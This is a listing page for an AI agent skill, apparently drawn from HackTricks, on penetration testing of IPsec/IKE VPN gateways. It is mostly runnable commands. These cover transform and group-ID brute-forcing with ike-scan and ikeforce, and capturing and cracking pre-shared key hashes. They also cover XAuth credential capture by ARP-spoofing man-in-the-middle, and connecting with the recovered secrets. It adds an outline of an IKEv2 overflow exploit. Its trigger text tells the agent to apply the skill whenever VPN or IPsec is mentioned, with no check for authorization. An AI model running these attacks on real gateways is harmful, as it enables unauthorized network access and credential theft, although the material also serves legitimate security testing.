OpenSkillIndex← back to search

Hacktricks-skills ipsec-ike-vpn-pentesting

Pentest IPsec/IKE VPN services on UDP ports 500 and 4500. Use this skill whenever the user mentions VPN pentesting, IPsec testing, IKE vulnerability assessment, or needs to enumerate and exploit IPsec/IKE VPN gateways. Trigger for any task involving VPN discovery, transformation enumeration, PSK cracking, XAuth attacks, or IKEv2 exploitation. Don't wait for explicit "pentest" language - if they mention VPN, IPsec, IKE, or port 500/4500, this skill applies.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/ipsec-ike-vpn-pentesting/SKILL.MD
source content

IPsec/IKE VPN Pentesting

A comprehensive skill for pentesting IPsec/IKE VPN services. This skill guides you through discovery, enumeration, and exploitation of IPsec/IKE VPN gateways.

Quick Start

# Basic discovery
nmap -sU -p 500,4500 <target>

# Find valid transformations
ike-scan -M <target>

# Fingerprint vendor
ike-scan -M --showbackoff <target>

Phase 1: Service Discovery

Initial Reconnaissance

Start by confirming the IPsec service is running:

# UDP scan for ISAKMP (port 500) and NAT-T (port 4500)
nmap -sU -p 500,4500 <target>

# Check for IKE version
nmap -sU -p 500 --script ike-version <target>

Expected output:

PORT    STATE SERVICE
500/udp open  isakmp
4500/udp open  ipsec-nat-t

Shodan Queries for Target Discovery

# Find exposed IPsec gateways
shodan search "port:500 IKE"
shodan search "udp port:500,4500"
shodan search "udp port:500,4500 WatchGuard"

Phase 2: Find Valid Transformations

A transformation is a combination of encryption, hash, authentication, and DH group parameters. You need to find at least one valid transformation before proceeding.

Basic Transformation Discovery

# Main mode scan (default)
ike-scan -M <target>

# Aggressive mode scan
ike-scan -A <target>

Interpreting results:

  • 1 returned handshake; 0 returned notify
    - Valid transform found, proceed
  • 0 returned handshake; 1 returned notify
    - No valid transforms, try brute-forcing
  • 0 returned handshake; 0 returned notify
    - Not an IPsec gateway

Brute-Force Transformations

If no valid transform is found, generate and test all combinations:

# Generate transformation dictionary
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do 
  for HASH in 1 2 3 4 5 6; do 
    for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do 
      for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do 
        echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt 
      done 
    done 
  done 
done

# Test each transformation
while read line; do 
  (echo "Testing: $line" && sudo ike-scan -M $line <target>) | 
  grep -B14 "1 returned handshake" | 
  grep "Testing:" 
done < ike-dict.txt

Alternative Tools

# Using iker.py
git clone https://github.com/isaudits/scripts.git
cd scripts && python iker.py <target>

# Using ikeforce
git clone https://github.com/SpiderLabs/ikeforce.git
cd ikeforce && pip install 'pyopenssl==17.2.0'
./ikeforce.py <target>

Phase 3: Vendor Fingerprinting

Using ike-scan Backoff Analysis

# Analyze timing patterns to identify vendor
ike-scan -M --showbackoff <target>

Example output:

Implementation guess: Cisco VPN Concentrator

WatchGuard Vendor ID Fingerprinting

WatchGuard Fireware OS encodes version info in Vendor ID payloads:

# Extract base64 from VID payload and decode
echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# Output: VN=12.11.3 BN=719894

Phase 4: Find Valid Group ID

You need a valid group ID (username) to capture the PSK hash. This requires aggressive mode support.

Test if Hash Capture is Possible

# Try with fake ID - if no hash returned, brute-forcing will work
ike-scan -P -M -A -n fakeID <target>

Brute-Force Group IDs

# Using ike-scan with wordlist
while read line; do 
  (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <target>) | 
  grep -B14 "1 returned handshake" | 
  grep "Found ID:" 
done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Using ikeforce for ID Discovery

# ikeforce uses multiple detection methods
./ikeforce.py <target> -e -w ./wordlists/groupnames.dic

ikeforce detection methods:

  1. Dead Peer Detection (DPD) response (Cisco-specific)
  2. Response packet count differences
  3. INVALID-ID-INFORMATION error messages
  4. Any response vs no response

Sniffing IDs from Live Traffic

If you can position yourself on the network:

# Capture aggressive mode packets (ID sent in clear)
tcpdump -i <interface> -s 0 -w ipsec.pcap udp port 500

Phase 5: Capture and Crack PSK Hash

Capture the Hash

# Requires: valid transform + valid ID + aggressive mode
ike-scan -M -A -n <valid_id> --pskcrack=hash.txt <target>

Crack the Hash

# Using psk-crack
psk-crack -d <wordlist> hash.txt

# Using John the Ripper
# First convert format
python ikescan2john.py hash.txt > john_hash.txt
john --wordlist=<wordlist> john_hash.txt

# Using Hashcat
hashcat -m 2500 hash.txt <wordlist>

Phase 6: XAuth Attacks

Credential Capture with fiked

# Setup MITM to capture XAuth credentials
# Requires: ARP spoofing to redirect IKE traffic
fiked -g <target_ip> -k testgroup:secretkey -l output.txt -d

Brute-Force XAuth Credentials

# Requires: valid group ID + cracked PSK
./ikeforce.py <target> -b -i <group_id> -u <username> -k <cracked_psk> -w <passwords.txt> [-s 1]

Phase 7: Establish VPN Connection

Using VPNC (Kali Linux)

# Create VPN profile
cat > /etc/vpnc/samplevpn.conf << EOF
IPSec gateway <VPN_GATEWAY_IP>
IPSec ID <VPN_CONNECTION_ID>
IPSec secret <VPN_GROUP_SECRET>
IKE Authmode psk
Xauth username <VPN_USERNAME>
Xauth password <VPN_PASSWORD>
EOF

# Connect
vpnc samplevpn

# Verify tunnel
ifconfig tun0

IKEv2 Exploitation Notes

Pre-Authentication Vulnerabilities

Modern IKEv2 implementations may have parsing bugs in IDi/CERT payloads:

Exploitation flow:

  1. Send valid IKE_SA_INIT to negotiate transforms
  2. Send IKE_SA_AUTH with malicious IDi payload
  3. Trigger buffer overflow or memory corruption
  4. Build ROP chain if mitigations are incomplete

Common IKEv2 Transforms

WatchGuard Fireware OS 12.11.3 examples:

  • SHA2-256–AES(256-bit) with DH Group 14
  • SHA1–AES(256-bit) with DH Group 5
  • SHA1–AES(256-bit) with DH Group 2
  • SHA1–3DES with DH Group 2

Practical Tips

  • Target both UDP/500 and UDP/4500 (NAT-T)
  • Increase UDP receive buffers for scanners
  • Use Vendor IDs to fingerprint vulnerable versions first
  • CVE-2025-9242: WatchGuard Fireware OS IKEv2 out-of-bounds write

Security Considerations

Weak DH Groups

Avoid targeting DH Groups 1 and 2 - they're considered weak:

  • DH Group 1: 768-bit MODP
  • DH Group 2: 1024-bit MODP

Nation-state actors can break these in real-time using pre-computation.

Authentication Types

  • PSK (Pre-Shared Key): Most common, vulnerable to brute-force
  • Certificates: More secure, harder to exploit
  • XAuth: Additional user authentication layer
  • EAP (IKEv2): Modern replacement for XAuth

Reference Tools

ToolPurposeInstallation
ike-scanTransformation discovery, ID brute-force
apt install ike-scan
ikeforceID brute-force, XAuth attacks
git clone https://github.com/SpiderLabs/ikeforce
iker.pyAlternative ID brute-force
git clone https://github.com/isaudits/scripts
fikedXAuth credential capture
apt install fiked
vpncVPN client connection
apt install vpnc
psk-crackPSK hash cracking
apt install psk-crack

Wordlists

  • /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
  • https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic

References